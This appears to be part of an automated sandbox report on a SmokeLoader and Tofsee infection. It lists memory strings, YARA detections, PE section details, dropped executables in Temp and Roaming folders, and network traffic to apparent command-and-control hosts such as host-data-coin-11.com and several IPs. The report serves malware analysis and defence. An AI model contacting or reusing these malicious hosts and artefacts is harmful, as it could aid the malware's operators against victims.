                      Source: svchost.exe, 0000002F.00000003.411494738.00000137971EE000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.411607267.0000013797184000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-01-07T11:33:20.1626869Z||.||d5cdcec3-04df-404e-ba07-3240047c89f9||1152921505694348672||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                      Source: svchost.exe, 0000002F.00000003.411494738.00000137971EE000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.411607267.0000013797184000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-01-07T11:33:20.1626869Z||.||d5cdcec3-04df-404e-ba07-3240047c89f9||1152921505694348672||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                      Source: svchost.exe, 0000002F.00000003.411494738.00000137971EE000.00000004.00000001.sdmpString found in binary or memory: hed\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify - Music and Podcasts","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NCBCSZSJRSB","Properties":{"FulfillmentData":{"ProductId":"9NCBCSZSJRSB","WuCategoryId":"5c353b9c-7ac7-4d27-af07-923e7d9aa2e2","PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","SkuId":"0011"},"FulfillmentType":"WindowsUpdate","FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"Spotify"}],"Architectures":["x86"],"Capabilities":["internetClient","runFullTrust","Microsoft.storeFilter.core.notSupported_8wekyb3d8bbwe"],"ExperienceIds":[],"MaxDownloadSizeInBytes":104380919,"MaxInstallSizeInBytes":203345920,"PackageFormat":"Appx","PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","MainPackageFamilyNameForDlc":null,"PackageFullName":"SpotifyAB.SpotifyMusic_1.176.447.0_x86__zpdnekdrzrea0","PackageId":"3fbafb47-f476-4c26-4445-49acb9a726e6-X86","PackageRank":30001,"PlatformDependencies":[{"MaxTested":2814750754275328,"MinVersion":2814750710366559,"PlatformName":"Windows.Desktop"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.isMain\":false,\"content.packageId\":\"SpotifyAB.SpotifyMusic_1.176.447.0_x86__zpdnekdrzrea0\",\"content.productId\":\"caac1b9d-621b-4f96-b143-e10e1397740a\",\"content.targetPlatforms\":[{\"platform.maxVersionTested\":2814750754275328,\"platform.minVersion\":2814750710366559,\"platform.target\":3}],\"content.type\":7,\"policy\":{\"category.first\":\"app\",\"category.second\":\"Music\",\"optOut.backupRestore\":true,\"optOut.removeableMedia\":false},\"policy2\":{\"ageRating\":3,\"optOut.DVR\":false,\"thirdPartyAppRatings\":[{\"level\":9,\"systemId\":3},{\"level\":81,\"sys
                      Source: svchost.exe, 0000002F.00000003.411494738.00000137971EE000.00000004.00000001.sdmpString found in binary or memory: hed\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify - Music and Podcasts","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NCBCSZSJRSB","Properties":{"FulfillmentData":{"ProductId":"9NCBCSZSJRSB","WuCategoryId":"5c353b9c-7ac7-4d27-af07-923e7d9aa2e2","PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","SkuId":"0011"},"FulfillmentType":"WindowsUpdate","FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"Spotify"}],"Architectures":["x86"],"Capabilities":["internetClient","runFullTrust","Microsoft.storeFilter.core.notSupported_8wekyb3d8bbwe"],"ExperienceIds":[],"MaxDownloadSizeInBytes":104380919,"MaxInstallSizeInBytes":203345920,"PackageFormat":"Appx","PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","MainPackageFamilyNameForDlc":null,"PackageFullName":"SpotifyAB.SpotifyMusic_1.176.447.0_x86__zpdnekdrzrea0","PackageId":"3fbafb47-f476-4c26-4445-49acb9a726e6-X86","PackageRank":30001,"PlatformDependencies":[{"MaxTested":2814750754275328,"MinVersion":2814750710366559,"PlatformName":"Windows.Desktop"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.isMain\":false,\"content.packageId\":\"SpotifyAB.SpotifyMusic_1.176.447.0_x86__zpdnekdrzrea0\",\"content.productId\":\"caac1b9d-621b-4f96-b143-e10e1397740a\",\"content.targetPlatforms\":[{\"platform.maxVersionTested\":2814750754275328,\"platform.minVersion\":2814750710366559,\"platform.target\":3}],\"content.type\":7,\"policy\":{\"category.first\":\"app\",\"category.second\":\"Music\",\"optOut.backupRestore\":true,\"optOut.removeableMedia\":false},\"policy2\":{\"ageRating\":3,\"optOut.DVR\":false,\"thirdPartyAppRatings\":[{\"level\":9,\"systemId\":3},{\"level\":81,\"sys
                      Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xmmufccsxa.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 257Host: host-data-coin-11.com
                      Source: unknownHTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.5:49785 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.5:49806 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.139.105:443 -> 192.168.2.5:49874 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49876 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49894 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49918 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49921 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49928 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49937 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Yara detected SmokeLoaderShow sources
                      Source: Yara matchFile source: 19.1.vfgiwcs.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.1.OG9rNsihJ7.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.vfgiwcs.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.OG9rNsihJ7.exe.5f15a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.OG9rNsihJ7.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.BFBD.exe.6c15a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.1.BFBD.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.vfgiwcs.6415a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.BFBD.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000018.00000002.366966979.00000000004B0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.279897390.0000000003031000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.349879535.00000000004A0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.298084613.0000000000680000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.349992094.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.366989519.00000000004D1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.298215878.0000000001FA1000.00000004.00020000.sdmp, type: MEMORY
                      Source: BFBD.exe, 00000016.00000002.355830576.00000000008EA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      Spam, unwanted Advertisements and Ransom Demands:

                      barindex
                      Yara detected TofseeShow sources
                      Source: Yara matchFile source: 42.2.xqfkdfcl.exe.840000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 42.2.xqfkdfcl.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 44.2.svchost.exe.7b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.3136.exe.6c0e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.3.3136.exe.7f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 42.2.xqfkdfcl.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 42.2.xqfkdfcl.exe.680e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 42.3.xqfkdfcl.exe.7f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 44.2.svchost.exe.7b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 42.2.xqfkdfcl.exe.840000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.3136.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.3136.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001D.00000002.380383276.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002A.00000003.388526176.00000000007F0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000002.524985253.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000003.362218485.00000000007F0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002A.00000002.391463142.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002A.00000002.391805380.0000000000680000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.380671348.00000000006C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002A.00000002.391938773.0000000000840000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 3136.exe PID: 5060, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: xqfkdfcl.exe PID: 5432, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3440, type: MEMORYSTR

                      System Summary:

                      barindex
                      PE file has nameless sectionsShow sources
                      Source: 3A7E.exe.5.drStatic PE information: section name:
                      Source: 3A7E.exe.5.drStatic PE information: section name:
                      Source: 3A7E.exe.5.drStatic PE information: section name:
                      Source: 3A7E.exe.5.drStatic PE information: section name:
                      Source: 3A7E.exe.5.drStatic PE information: section name:
                      Source: 3A7E.exe.5.drStatic PE information: section name:
                      Source: 7808.exe.5.drStatic PE information: section name:
                      Source: 7808.exe.5.drStatic PE information: section name:
                      Source: 7808.exe.5.drStatic PE information: section name:
                      Source: 7808.exe.5.drStatic PE information: section name:
                      Source: 7808.exe.5.drStatic PE information: section name:
                      Source: 7808.exe.5.drStatic PE information: section name:
                      Source: 9789.exe.5.drStatic PE information: section name:
                      Source: 9789.exe.5.drStatic PE information: section name:
                      Source: 9789.exe.5.drStatic PE information: section name:
                      Source: 9789.exe.5.drStatic PE information: section name:
                      Source: 9789.exe.5.drStatic PE information: section name:
                      Source: 9789.exe.5.drStatic PE information: section name:
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6924 -ip 6924
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 0_2_0042A4F0
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 0_2_00424E60
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 0_2_0042B2D0
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 0_2_005F31FF
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 0_2_005F3253
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 1_2_00402A5F
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 1_2_00402AB3
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 1_1_00402A5F
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 1_1_00402AB3
                      Source: C:\Users\user\AppData\Roaming\vfgiwcsCode function: 18_2_00643253
                      Source: C:\Users\user\AppData\Roaming\vfgiwcsCode function: 18_2_006431FF
                      Source: C:\Users\user\AppData\Roaming\vfgiwcsCode function: 19_2_00402A5F
                      Source: C:\Users\user\AppData\Roaming\vfgiwcsCode function: 19_2_00402AB3
                      Source: C:\Users\user\AppData\Local\Temp\B1B2.exeCode function: 20_2_004027CA
                      Source: C:\Users\user\AppData\Local\Temp\B1B2.exeCode function: 20_2_00401FF1
                      Source: C:\Users\user\AppData\Local\Temp\B1B2.exeCode function: 20_2_0040158E
                      Source: C:\Users\user\AppData\Local\Temp\B1B2.exeCode function: 20_2_004015A6
                      Source: C:\Users\user\AppData\Local\Temp\B1B2.exeCode function: 20_2_004015BC
                      Source: C:\Users\user\AppData\Local\Temp\B1B2.exeCode function: 20_2_00411065
                      Source: C:\Users\user\AppData\Local\Temp\B1B2.exeCode function: 20_2_00412A02
                      Source: C:\Users\user\AppData\Local\Temp\B1B2.exeCode function: 20_2_0040CAC5
                      Source: C:\Users\user\AppData\Local\Temp\B1B2.exeCode function: 20_2_00410B21
                      Source: C:\Users\user\AppData\Local\Temp\B1B2.exeCode function: 20_2_004115A9
                      Source: C:\Users\user\AppData\Local\Temp\B1B2.exeCode function: 20_2_0208160C
                      Source: C:\Users\user\AppData\Local\Temp\B1B2.exeCode function: 20_2_020815DE
                      Source: C:\Users\user\AppData\Local\Temp\B1B2.exeCode function: 20_2_020815F6
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeCode function: 22_2_008F8004
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeCode function: 24_2_00402A5F
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeCode function: 24_2_00402AB3
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeCode function: 24_1_00402A5F
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeCode function: 24_1_00402B2E
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_00410800
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_00411280
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_004103F0
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_004109F0
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_006D0640
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_006D0C40
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_006D0A50
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_006D14D0
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeCode function: 29_2_0040C913
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeCode function: 29_2_00425090
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeCode function: 29_2_0042B500
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeCode function: 29_2_0042A720
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeCode function: 30_2_029596F0
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeCode function: 30_2_02950B7A
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeCode function: 30_2_02950470
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeCode function: 30_2_02950462
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeCode function: 30_2_04FA1810
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeCode function: 30_2_04FA53F8
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeCode function: 30_2_04FA0448
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeCode function: 30_2_04FA2E48
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeCode function: 30_2_04FBA430
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeCode function: 30_2_04FB1528
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeCode function: 30_2_04FB67B8
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeCode function: 30_2_04FB2C88
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeCode function: 30_2_04FBAD68
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeCode function: 30_2_04FB08B0
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeCode function: 30_2_04FB5B58
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeCode function: 30_2_04FB90D3
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeCode function: 29_2_00401280 ShellExecuteExW,lstrlenW,GetStartupInfoW,CreateProcessWithLogonW,WaitForSingleObject,CloseHandle,CloseHandle,GetLastError,GetLastError,
                      Source: OG9rNsihJ7.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: OG9rNsihJ7.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: OG9rNsihJ7.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: OG9rNsihJ7.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 45AA.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 45AA.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 45AA.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 54AF.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: FC2A.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: FC2A.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: FC2A.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: B1B2.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: B1B2.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: B1B2.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: BFBD.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: BFBD.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: BFBD.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: BFBD.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 254E.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 254E.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 254E.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 254E.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 3136.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 3136.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 3136.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 3136.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 2F32.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: vfgiwcs.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
